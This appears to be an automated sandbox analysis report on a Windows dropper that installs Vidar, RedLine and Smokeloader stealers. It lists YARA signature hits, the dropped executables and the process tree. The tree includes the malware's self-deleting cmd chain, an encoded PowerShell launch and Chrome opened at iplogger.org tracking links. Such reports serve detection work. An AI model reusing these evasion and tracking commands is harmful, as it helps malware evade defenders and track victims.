                    Source: 0.3.q1wLT3xKiY.exe.45ed014.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                    Source: 26.2.brokerius.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                    Source: 21.0.namdoitntn.exe.d30000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 21.0.namdoitntn.exe.d30000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
                    Source: 25.0.jshainx.exe.220000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 25.0.jshainx.exe.220000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
                    Source: 0000000E.00000002.462192627.00000000006D8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000016.00000002.415807819.0000000001264000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                    Source: 0000001E.00000003.379532614.0000000002293000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, score = , reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings
                    Source: 00000015.00000000.309615182.0000000000D32000.00000002.00000001.01000000.00000009.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
                    Source: 0000001F.00000002.742694757.00000000001B3000.00000002.00000001.01000000.00000013.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                    Source: 00000017.00000000.313593133.0000000000422000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
                    Source: 00000019.00000000.314893587.0000000000233000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
                    Source: 00000016.00000000.310875811.0000000001264000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                    Source: 0000001A.00000000.319293478.0000000000064000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                    Source: 0000001A.00000002.586136354.0000000000064000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                    Source: 00000000.00000003.268213249.0000000004570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                    Source: 0000000E.00000002.459641391.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 0000001F.00000000.344396019.00000000001B3000.00000002.00000001.01000000.00000013.sdmp, type: MEMORYMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                    Source: Process Memory Space: real.exe PID: 5308, type: MEMORYSTRMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                    Source: Process Memory Space: brokerius.exe PID: 7612, type: MEMORYSTRMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                    Source: Process Memory Space: WW1.exe PID: 7760, type: MEMORYSTRMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: C:\Program Files (x86)\Company\NewProduct\jshainx.exe, type: DROPPEDMatched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exe, type: DROPPEDMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe, type: DROPPEDMatched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe, type: DROPPEDMatched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: String function: 00409F79 appears 112 times
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeCode function: String function: 023994ED appears 112 times
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: String function: 004199E0 appears 34 times
                    Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exeCode function: String function: 00409F79 appears 112 times
                    Source: captain09876.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, 567907 bytes, 1 file
                    Source: ordo_sec666.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-63057E22-1748.pmaJump to behavior
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@133/206@18/20
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeFile read: C:\Program Files (x86)\desktop.iniJump to behavior
                    Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeFile created: C:\Program Files (x86)\CompanyJump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeFile read: C:\Users\user\Desktop\q1wLT3xKiY.exeJump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\q1wLT3xKiY.exe "C:\Users\user\Desktop\q1wLT3xKiY.exe"
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1ARmX4
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AAmX4
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AFmX4
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AGmX4
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1672,i,2200090392483505353,13259448681473421789,131072 /prefetch:8
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1852 --field-trial-handle=1800,i,4002354000526200566,13683174315975428069,131072 /prefetch:8
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AJmX4
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1780,i,2243672671988617880,5445177111515229420,131072 /prefetch:8
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AKmX4
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AZmX4
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AVmX4
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\F0geI.exe "C:\Program Files (x86)\Company\NewProduct\F0geI.exe"
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe "C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe"
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1968 --field-trial-handle=1828,i,6770499846379427692,11301094581731792919,131072 /prefetch:8
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1808,i,14561123893253289643,1012939592416384631,131072 /prefetch:8
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe "C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe"
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\real.exe "C:\Program Files (x86)\Company\NewProduct\real.exe"
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\safert44.exe "C:\Program Files (x86)\Company\NewProduct\safert44.exe"
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1972 --field-trial-handle=1712,i,17276114921128893629,13810006438660092211,131072 /prefetch:8
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\jshainx.exe "C:\Program Files (x86)\Company\NewProduct\jshainx.exe"
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\brokerius.exe "C:\Program Files (x86)\Company\NewProduct\brokerius.exe"
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1940 --field-trial-handle=1732,i,11424558033472135501,3208527025666120732,131072 /prefetch:8
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\captain09876.exe "C:\Program Files (x86)\Company\NewProduct\captain09876.exe"
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1964 --field-trial-handle=1816,i,4998864990956341523,321811726047907557,131072 /prefetch:8
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe "C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe"
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files (x86)\Company\NewProduct\WW1.exe "C:\Program Files (x86)\Company\NewProduct\WW1.exe"
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4528 --field-trial-handle=1672,i,2200090392483505353,13259448681473421789,131072 /prefetch:8
                    Source: C:\Program Files (x86)\Company\NewProduct\real.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im real.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Company\NewProduct\real.exe" & del C:\PrograData\*.dll & exit
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im real.exe /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8304 --field-trial-handle=1672,i,2200090392483505353,13259448681473421789,131072 /prefetch:8
                    Source: C:\Program Files (x86)\Company\NewProduct\captain09876.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7704 --field-trial-handle=1672,i,2200090392483505353,13259448681473421789,131072 /prefetch:8
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7968 --field-trial-handle=1672,i,2200090392483505353,13259448681473421789,131072 /prefetch:8
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4528 --field-trial-handle=1672,i,2200090392483505353,13259448681473421789,131072 /prefetch:8
                    Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im brokerius.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Company\NewProduct\brokerius.exe" & del C:\PrograData\*.dll & exit
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im brokerius.exe /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMwA0AA==
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Program Files (x86)\Company\NewProduct\WW1.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im WW1.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\Company\NewProduct\WW1.exe" & del C:\PrograData\*.dll & exit
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /im WW1.exe /f
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 6
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1ARmX4Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AAmX4Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AFmX4Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AGmX4Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AJmX4Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AKmX4Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AZmX4Jump to behavior
                    Source: C:\Users\user\Desktop\q1wLT3xKiY.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AVmX4Jump to behavior
